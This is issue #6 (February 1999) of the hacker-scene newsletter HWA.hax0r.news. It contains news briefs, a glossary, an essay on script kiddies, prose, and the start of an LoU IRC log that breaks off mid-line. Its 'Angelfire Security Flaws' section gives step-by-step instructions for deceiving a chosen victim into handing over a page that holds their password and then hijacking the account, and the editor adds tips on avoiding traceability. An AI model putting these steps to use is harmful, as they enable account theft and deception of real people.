[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 6 Volume 1 1999 Feb 13/14th 99 ========================================================================== "You know its going to be one of those days when you wake up at 4am and go into #insomniacs for some company but everyone else is asleep..." - VeXxation Synopsis -------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA ------------------------------------------------------------------------- Welcome to HWA.hax0r.news ... #6 S P E C I A L I S S U E tHe | - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 0.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ *News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!* News (New site unconfirmed).......http://cnewz98.hypermart.net/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. Referenced news links ~~~~~~~~~~~~~~~~~~~~~ http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) BEST-OF-SECURITY Subscription Info. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _/_/_/ _/_/ _/_/_/ _/ _/ _/ _/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/_/ _/_/ _/_/_/ Best Of Security "echo subscribe|mail best-of-security-request@suburbia.net" or "echo subscribe|mail best-of-security-request-d@suburbia.net" (weekly digest) For those of you that just don't get the above, try sending a message to best-of-security-request@suburbia.net with a subject and body of subscribe and you will get added to the list (maybe, if the admin likes your email). @HWA 0.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ 'A "thug" was once the name for a ritual strangler, and is taken from the Hindu word Thag... ' - Ed Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ scruciphux@dok.org.......... currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution And an HWA member doing the job of proof reading: vexxation@usa.net ........: currently active/IRC+ proof reading Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site Contributors to this issue: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ liquid phire......................: underground prose pH4RcYd3 .........................: The Future of Hacking+ Qubik ............................: Hacking in Germany+ Ruffneck .........................: LoU irc log+ Spikeman .........................: daily news updates+ Wile .............................: News from Tokyo :-p 1. We do NOT work for the government in any shape or form. 2. Unchanged since issue #1, @HWA 0.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff 0.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (unchanged) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) *AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? CC - Credit Card phraud CCC - Chaos Computer Club (Germany) EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare CT - Cyber Terrorism TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. 1.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. Shouts to: * Kevin Mitnick * demoniz * The l0pht crew * tattooman * Dicentra * Pyra * Vexxation * FProphet * TwistedP * NeMstah * the readers * all the people who sent in cool emails and support * our new 'staff' members. kewl sites: + http://www.freshmeat.net/ + http://www.slashdot.org/ + http://www.l0pht.com/ + http://www.2600.com/ + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/) + http://www.legions.org/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) @HWA 1.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Check out http://c5.hakker.com/ kewl hostname, kewl host, i was bribed to say this and its in German so I dunno if its great or not but check em out anyways, webhosting, email forwarding etc etc ;) (Pages in German) ++ IS YOUR 'FREEMAIL' ACCOUNT FULL OF SECURITY HOLES? Contributed by me, source: ZDNet news, see section 11 for the full article. If you have an account on Hotmail, Yahoo!, or Excite, it's vulnerable to hackers. Ira Winkler investigates the security risks of free e-mail services. http://chkpt.zdnet.com/chkpt/zdnu99021301/www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2205746,00.html ++ 15 YR OLD AND 18 YR OLD BUSTED FOR ATTEMPTED COMPUTER BREAKINS (HNN/contributed by erehwon) Source: Washington Post Vienna Virginia police have arrested a 15 year old freshman for breaking into the computers at Clemson University and attempting to break into systems at NASA. The Vienna student was arrested Feb. 1 on charges of felony computer trespass and misdemeanor computer fraud. Authorities in South Carolina have arrested Steven Ray McAlister, 18, of Pelzer, S.C., and charged him with conspiracy to commit computer crime, naming the Vienna youth as his co-conspirator. http://search.washingtonpost.com/wp-srv/WPlate/1999-02/12/032l-021299-idx.html ++ Dallas Semi Debuts Single-Chip Temperature Data Logger Contributed to HWA by Spikeman Source: techweb       DS1615 Temperature Recorder integrates a Y2K-compatible       real-time clock, digital thermometer, nonvolatile memory, control      logic, and serial interface. http://www.techweb.com/wire/story/TWB19990211S0008     ++ Where's Waldo? Maybe On The Edge Of A Chip Contributed to HWA by Spikeman Source: techweb       Designers have been putting their initials on chips for years, but      finer geometries open the possibility of more sophisticated images,      such as cartoon characters. http://www.techweb.com/wire/story/TWB19990211S0001 ++ AT&T CEO: Scrap Phone-Access Charges Contributed to HWA by Spikeman Source: techweb      Dumping access charges means an end to universal service, a      decades-long tradition of low-cost phone service to rural areas. http://www.techweb.com/wire/story/TWB19990210S0016   ++ DOJ: Microsoft Feared Fair Competition Contributed to HWA by Spikeman Source: techweb      The government's lead attorney says Microsoft feared competing      with Netscape and relied on exclusionary contracts with ISPs. http://www.techweb.com/wire/story/msftdoj/TWB19990210S0014 ++ Gateway Looks To Serve Networked Homes Contributed to HWA by Spikeman Source: techweb      Gateway is designing a server to serve the networked home of the       future. http://www.techweb.com/wire/story/TWB19990210S0017 ++ MTV's Road Rules, a hacker haven? Abe, some dork on Road Rules an MTV show was seen sporting an "official" r00t hat... you mean just anyone can't make a hat with "r00t" on it? geez anyway w00t to the r00t ... contributed by everyone and even discussed on irc and dc-stuff ... (*sigh*) watch for the new HWA.hax0r.news t-shirts and hats to come soon!!! =) (No offense to r00t intended, they rock harder than MTV ever could - Ed ps. add me to the bots! ? whats the #Hack key? ;) ++ Online Freedom Of Information Sparks Fears Contributed to HWA by Spikeman Source: techweb      Requirement to publish disaster information about nation's chemical       plants may be road map for terrorists, lawmakers say. http://www.techweb.com/wire/story/TWB19990210S0015 ++ ONLINE PORN  VIGILANTE "A LIAR" (CULT. 9:20 am) Contributed to HWA by Spikeman Source: ZDNnet news http://www.wired.com/news/news/email/explode-infobeat/culture/story/17789.html       A former hacker made headlines all over the world when he declared war on child pornographers. But his one-man campaign wasn't all it was cracked up to be. By Steve Silberman. ++ FREE PCS -- WITH A CATCH (BUS. 7:28 am) Contributed to HWA by Spikeman Source: ZDNet news http://www.wired.com/news/news/email/explode-infobeat/business/story/17783.html        A California start-up is offering Compaq computers to the        first 10,000 people to sign away their consumer privacy. ++ BT, MICROSOFT IN WIRELESS DEAL (BUS. 7:28 am) Contributed to HWA by Spikeman Source: ZDNet news http://www.wired.com/news/news/email/explode-infobeat/business/story/17784.html        The two companies reach an agreement to develop Internet and        corporate data services for mobile users.            ++ CHINESE DISSIDENT APPEALS (POL. 7:28 am) Contributed to HWA by Spikeman Source: ZDNet news http://www.wired.com/news/news/email/explode-infobeat/politics/story/17785.html        A software engineer is fighting the two-year sentence that a Shanghai court gave him for providing email addresses to US-based publications. ++ Early Y2K Suit Struck Down Contributed to HWA by Spikeman Source: The Recorder " ...in California Intuit Inc. has won another round in the ongoing Y2K litigation wars. A California judge has dismissed most of the case against it in a combined class action suit, In re Intuit Inc. Year 2000 California Litigation. Plaintiffs had alleged that Intuit's Quicken financial software is not Year 2000 compliant and that consumers had already been damaged as a result. The judge threw out damages and fraud claims, but said plaintiffs could amend their injunctive relief complaint, which centers on the charge that Intuit engaged in unfair business practices." (The Recorder) -- For complete story, see; http://www.lawnewsnetwork.com/stories/feb/e020899k.html) ++ HACKER STEALS WOMAN'S PASSWORD, SENDS PORNO OFFER IN HER NAME - SF Gate 02/04/99 Contributed to HWA by Spikeman Source: SF Gate http://www.sfgate.com/cgi-bin/article.cgi?file=/news/archive/1999/02/04/state1338EST0026.DTL (02-04) 10:38 PST APTOS, Calif. (AP) -- A 70-year-old woman who used the Internet to learn about quilting and coins was targeted by a hacker who stole her password and used it to send 22,000 pornographic e-mails in her name. "Lucille Nordgren, a grandmother of five, thought America Online was a convenient way to follow her hobbies. She was still reeling on Thursday from the news her account was used to send electronic ads for a web site offering ``incest, fetishes, super young teens, wild orgies and bondage.'' ++ Web Site Won Contributed to HWA by Spikeman The anti-abortion Web site the Nuremberg Files was thrown on the defensive by last week's federal court jury verdict. Then, the site was shut down Friday afternoon by its Internet service provider, MindSpring. However, 54-year-old computer programmer Otis O'Neal "Neal" Horsley, is searching for another ISP. The good news for Horsley is that the judge in the Portland, Ore., case refused to grant an injunction closing down the site. "If I go to jail over this, I take the First Amendment with me," Horsley said. (Fulton County Daily Report -- For complete story, see http://www.lawnewsnetwork.com/stories/feb/e020899h.html) ++ Intel Trying to Oust FTC Lawyer Contributed to HWA by Spikeman Intel is trying to bench the lead government counsel in the Federal Trade Commission's antitrust case against the chip maker. Richard Parker, deputy director of the agency's competition bureau and first chair for the upcoming March 9 trial, is the subject of a motion to disqualify. Intel filed the motion under seal last month. The company declined to comment on its grounds for disqualifying Parker, but Parker's former law firm, O'Melveny & Myers, represented Advanced Micro Devices in its court battles with Intel in the early '90s, and former O'Melveny partner Tom McCoy left the firm to become AMD's general counsel. An FTC spokesperson said that it had cleared Parker's involvement in the case with two ethics experts. (CNET News -- For complete story, see http://www.news.com/News/Item/0,4,32148,00.html?st.ne.ni.lh) Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news you want to read about in a timely manner ... - Ed @HWA 2.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* *Ok kiddies we're pumping out some more stuff here as we steamroll into *issue #6 i'm wondering if we can really pull off a weekly release as *hoped. I mean hopefully not too many people are getting caught and not *too many sites (bah hahahaha yeah right) are being vandalized by the script *kiddiez etc. Work continues on hwa-iwa.org which is running Debian Linux at *this time, i'm playing around with some stuff there but don't bother port *scanning etc u won't find anything interesting on that box unless you really *want to snarf half written articles etc ... besides if you did break *in i'd just end up writing a story about it so whats the point? *g* moving *right along, thanks for the continued support everyone and tty next time... */ printf ("EoF.\n"); } www.hwa-iwa.org is now online but not ready for primetime yet, if you go there you will just be presented with a link to the HWA.hax0r.news mirrors the site is under major development and will be announced here when it goes "online for primetime" with webboard and file archives etc etc, stay tuned for more as it becomes available ie: as I get it done ... ;) Issue #6! ... w00t w00t w00t! ... w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk. 1. A transcursion or transcendance into joy from an otherwise inert state 2. Something Cruciphux can't go a day without typing on Efnet Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 3.0 The Future of Hacking by pH4RcYd3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ------------------------- The Future of Hacking ========================= by pH4RcYd3!pDX [ pArAd0x ] pH4RcYd3@hotmail.com The future of Hacking some people do not think about...But as I was browsing CyberArmy.com's WWWBoard for some interesting conversations I was bombarded by messages saying "Anyone have a Win98 Spoofer" and "How do you find out someone's IP number in AOL" and such things like that. These tell me one thing about a person...LAMER! These people do not know any other OS except Winblowz and like to nuke and punt people for whatever immature reason. They like to send out virii and scerew up someone's computer for no absolute reason. If I ever met one of these people in person you know what I would see? I would see a 13 yr. old boy (or girl) cowering behind his WinNuke walking around a computer store asking people if they memorized there IP number and if they did, can they give it to him. Now I realize that i'm generalizing packet warriors at around teen years, but I won't be quick to speak for all 13 yr olds. Some of them may have a great understanding of Unix and all its other variations and might be more l33t than yours truly. But if you've ever gotten into a fight with someone from AOL, or any other packet warrior they think there hackers and they try to mailbomb you and nuke you, icmp you, and any other windows based attack. Not to say that I hate AOL, it's just some packet warrior newbies, meaning new to DoS attacks and such are usually from AOL, and they started out using punters. In fact I think AOL is good for people that don't have that much experience with being online and on the internet, AOL provides a lovely user interface, and is definitely user friendly. Now if these people ever got into Linux they would probaly be teardropping and smurfing everybody but that's not the case because there to illiterate to new information. The information they could find on Webpages by spending 2 to 3 hours everyday reading articles is amazing. But they choose not to. I didn't say they were to dumb to learn how to use any other OS, or to learn some of the flaws of a system. They just don't want to, to learn something you have to want to learn it. But when they finally, maybe, when when they r00t there first server, they usually did it by an exploit. Script kiddies aren't that bad, to exploit the bug in the system you must first upload the exploit, to upload something you need an account? How did they get the account? Well probaly by getting the passwd file and cracking it if it's not shadowed. This is better than having them running around IRC shoving packets down peoples throats. At least there out there learning atleast SOMETHING from hacking a server. I would rather have them find some other way to gain entry to a server but hey, somethings will never change. I'm truly interested too see what the future of Hacking will have instore for us. What did u think of this article? Drop me a line at pH4RcYd3@hotmail.com @HWA 3.1 Angelfire Security flaws by pH4RcYd3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ============================ Angelfire Security Flaws by pH4RcYd3(@hotmail.com) pDX![ pArAd0x ] ---------------------------- Slightly reformatted/edited for clarity - Ed Introduction ~~~~~~~~~~~~ Earlier in the year, I found an article on the web that eZoOns wrote about hacking Angelfire. The method of social engineering and method to hack Angelfire was insignificant. I offer you what I think is a better article. Remember this is for educational purposes only and I take no responsibility for what you might do with this information. First Things First ~~~~~~~~~~~~~~~~~~ Well first you have to get the page that you get right after you login to your Angelfire account. This page is called BEDIT.HTML And a couple ines down from the is their password. Your page http://www.angelfire.com/mi/KrazieBread/index.html has been saved.
You may have to click Reload or Super-Reload (Shift+Reload) to see your edited page and not your old version when you go to your URL.
You can also announce your new page on WhoWhere?, What's New Too!, or if you really want to get noticed, go to Submit It!
Tune up your Web Site at the Web Site Garage.
<-------THE PASSWORD!!! Alright so now you know where the password is, finding the username is a synch because it's in their URL. Http://www.angelfire.com/whatever/USERNAME/ This is a dumb flaw in the Angelfire user security, yet a very dangerous one if used right.Kind of lame actually. Moving in for the Kill ~~~~~~~~~~~~~~~~~~~~~~ Ok first things first 1.) Find some guy that you want to hack and tell him that you found a bug in IE 4.0 and Netscape Communicator that let's you install keyloggers and packet sniffers on their system through a perl script. 2.) Tell the guy you need his bedit.html page because you need some of the info on there, cause if you don't have it the script won't work. 3.) After he sends u the file get the shit you need...Login, and then from the bedit.html page click change e-mail (don't use your real one) one from Hotmail or something. 4.) Whatever you want to do with the page is your choice, but remember.. be mature about it and don't do anything you'll regret later..that line sounded stupid. Conclusion ~~~~~~~~~~ Well I hope you've enjoyed this article. Thanx to eZoOns for discovering this vulnerability in the Angelfire system. And greetz to IllumiTIE, Big Cheese, JellyNuts, Optiklenz, GodsHippy, Legion2000, HcV, HFG, and all black hat hackzers!#%^ Side note; ~~~~~~~~~~ BTW, although Hotmail is a favourite of 'hackers' make sure you all realize that whatever ip you are logged in from when sending a message is INCLUDED in the HEADERS of your message. Not everyone can see these if they are using some shit software by a small concern called Mircosloth or Mickeysnoft or some wacked shit like that so be forewarned, HOTMAIL IS NOT ANONYMOUS and using a hacked acct to send the mail can be incriminating so be careful, use a mail forwarding service like netaddress and nightmail, anyone wanna do an article on anonymous mailing/receiving? - Ed @HWA 3.2 Some underground prose by Liquid Phire ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I really liked this, it grabs you by the short hairs and pulls tightly read it and understand, for this is very much what it is like to be a part of the underground as a newbie and beyond. - Ed Reorder (c) 1999 phiregod i am a hunter, searching this underground of electricity for an indiana jones-esque treasure. i plunge through the piles of bullshit, and sever the arteries of the sane. i found god, and i wasnt pleased, i found the messiah, and i wasnt saved. my very soul did i lay upon the altar, and when i lost it, i found it never was. machiavellian superheros shook my hand and turned their backs. my vision was clouded by the ciggerette smoke, and my voice was hindered by a well meaning gag. i placed my hands on the planchette and found the answer that i already knew. on a bloody sunday, i covered my eyes as to not see the plague. i felt the refreshing rain of revolution on my burning skin and i cried. i climbed the highest mountian i could find, surmounted the greatest challange and i found not even that was enough to distract me from the pain i felt. there are too many people to save, too many to even count. i read every bit of weathered parchment that i coud find, i plundered the the lair of every thief in search of text that would provide redemption. i gazed into the cherubic eyes, i smiled back at the chesire grins, i found no path to follow. at this point it was obvious that i would have to cut the road myself. The line was busy. The line was busy. The line was busy. The line was busy. The line was busy. as a draw another breath through my hookah of modern voodoo an image of a brave new world floods my mind. this sarcophagus of a free medium is merely another channel to convey advertisements. the few that dare to betray what they were born for, are hunted by those that serve the institution that we call a government. this house of cards that we reside in will not protect us from the inevitable storm. i have joined the danse macabre, i close my eyes to avoid the light. in this year 1984 i feel forced to conform to a norm that doesnt exsist. fleeting glimpses of a better place catch my eye as i take the hand of anubis and desend into the world i belong. in these apocalyptic times it is easier to turn away then to face the fight. i listen to the anthems of every power crazed country, i've found occasion to sing along, looking for a cause to fight for. more people here are looking for fame and fortune, i became a god when i lost the desire to obtain what i couldnt have. i was baptized in the runoff the the information super highway, yes, it even rains in hell. i've shed my armor of warez, i burned the castle of manuals, and i'm trying to say what others cant put into words. i followed dante's footsteps, and i drank hamlet's wine. if i'm going to die then i have nothing left to lose. if i seek not fame or fortune, i have nothing left to win. i want every scrap of information that was ever given birth to in this maquis, i seek to become the personifacation of what no one can have. this is the manifesto of the product of modern life; money, comic books, games, knowledge, and sex. i'm not claiming everyone belives this, i doubt many of the few that will read it will understand in a vauge way what i am trying to say. thats not a bad thing, the more poeple that are blind, the easier it will be to slip by unnoticed. this is where i belong, a faceless name, in all the faceless names that swarm the internet. phiregod comments: liquidphire@hotmail.com cc: hwa@press.usmc.net I took the liberty of naming this piece "reorder" the phreaks will understand this one, hope phiregod doesn't mind, keep writing and don't give up, some of us do understand ... - Ed @HWA 4.0 The LoU irc log with comments from ex-LoU member Bronc Buster ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I was unable to release this earlier because my source was not given permission to pass this on, however things have settled somewhat and it is now "ok" to include here so here it is in its' entirety, hopefully it will shed a bit of light on the whole LoU situation or at least add to the intrigue, unabridged please note that none of this information has been confirmed and the source is "unknown" please remember this when reading, however it does look legit and jives with what we have seen in the past regarding the LoU story, machine names of people joining the chat have been REMOVED by me for obvious reasons ... * NOTE * An informative message and some enlightened words follow this log (no apologies for the length we try to put out news with as little 'editing' as possible..) from Bronc Buster whom has, effective two days prior to this writing resigned from LoU on friendly terms. - Ed Subject: IRC log Date: Thu, 21 Jan 1999 19:36:16 +0100 From: "John" To: Hi! Here's the complete log of the IRC meeting of LoU and others... Session Start: Wed Jan 20 02:34:46 1999 * Logging #event to '#event.log' [02:34] *** Now talking in #event [02:38] *** Joins: kInGb0nG (~lil_b0ng@*!*.com) [02:45] *** Joins: m0f0__ (synnergy@*!*.??) [02:46] *** m0f0 is now known as fewer [02:47] heh [02:47] is it fixed yet? [02:48] which problem is that? [02:48] the bitchx one [02:48] I'm compiling bitchx right now on the server [02:48] *** Quits: feur (irc, where is the wizard of OZ) [02:48] ok, i compiled, epic, ircii, sirc.. but i don;t like them all [02:49] *** Quits: m0f0- (Leaving) [02:49] *** Quits: fewer (Leaving) [02:49] *** Quits: m0f0__ (Hey! Where'd my controlling terminal go?) [02:49] *** m0f0_ is now known as m0f0 [02:49] what did you find bitchx was doing or not doing? [02:49] it says nick not registered yet [02:50] you can join a channel, but not talk in there [02:51] *** Joins: feur (~cifer@*!*.rr.com) [02:51] weird [02:54] some people are still getting a no more connectiions i= n your class message [02:55] that's bizzare.. lemmy check the classes 1 more time [02:55] rehash the server? [02:55] *** Joins: lothos (lothos@*!*.??) [02:57] class 10 is set to 100, class 2 is set to 50 and class 1 = is set to 400 [02:58] just HUP'ed to make sure it's loaded [02:58] *** Joins: cd (~gerrie@*!*.net) [02:58] ok, let's see then [03:00] ok [03:00] *** Joins: sdak (synnergy@*!*.net) [03:00] *** Quits: sdak (BitchX by any other name is still BitchX) [03:00] bitchx still flips here, bleh [03:00] *** Joins: Kanuchsa (das@*!*.com) [03:02] *** Joins: DigiEbola (digi@*!*.net) [03:02] ok [03:02] cant you this type? [03:02] yeah, you dweeb [03:03] * feur is away, autoaway [log:ON] [page:ON] [03:03] *** Quits: Kanuchsa (: Xing) [03:03] *** Joins: Winn (Winn@*!*.uu.net) [03:03] *** Joins: MsIW (Beachie@*!*.uu.net) [03:04] *** Parts: lothos (lothos@*!*.??) [03:04] *** Joins: lothos (lothos@*!*.jp) [03:05] *** lothos is now known as lothos- [03:06] *** Quits: MsIW (Hey it has been fun! Thanks!!! Hugs!!! Kiss!!!) [03:06] heh [03:07] heh [03:07] What happned to MS? [03:07] * m0f0 wonders [03:07] . [03:08] uggy uggy ircII [03:08] shes had dialup probs [03:08] delam - dude! [03:08] hey :) [03:08] *** Joins: Mark668 (~irc@*!*.pacbell.net) [03:08] allright, we are waiting for some folks then we will begin= , [03:08] we're wating for a couple more. [03:08] winn I think I'm outdated here heh [03:08] hehehehe... who;s the oldest here? [03:09] 46 [03:09] woo [03:09] 49 [03:09] Yo, Lou. [03:09] 69 1/2 [03:09] *** Joins: MsIW (Beachie@*!*.uu.net) [03:09] not to sound like "I remember the old days" but I did mos= t of my IRC in 